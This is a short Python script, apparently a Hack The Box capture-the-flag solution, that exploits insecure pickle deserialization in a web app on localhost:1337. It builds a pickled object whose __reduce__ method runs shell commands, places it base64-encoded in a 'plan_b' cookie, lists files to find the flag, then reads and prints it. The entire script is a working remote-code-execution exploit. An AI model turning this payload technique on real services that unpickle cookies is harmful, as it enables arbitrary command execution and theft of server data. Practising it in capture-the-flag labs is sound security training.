import requests, pickle, base64
def pickle_rce(cmd):
class PickleRce(object):
def __reduce__(self):
import subprocess
return (subprocess.check_output, (cmd,))
return PickleRce()
def get_flag_name(html):
return "flag_" + html.split("flag_")[1].split("\\n")[0]
def get_flag(html):
return "HTB{" + html.split("HTB{")[1].split("}")[0] + "}"
get_flag_name_cookie = base64.b64encode(pickle.dumps({'serum':
pickle_rce(["ls"])})).decode()
flag_name = get_flag_name(requests.get('http://localhost:1337/', cookies=
{'plan_b': get_flag_name_cookie}).text)
get_flag_cookie = base64.b64encode(pickle.dumps({'serum': pickle_rce(["cat",
flag_name])})).decode()
flag = get_flag(requests.get('http://localhost:1337/', cookies={'plan_b':
get_flag_cookie}).text)
print(flag)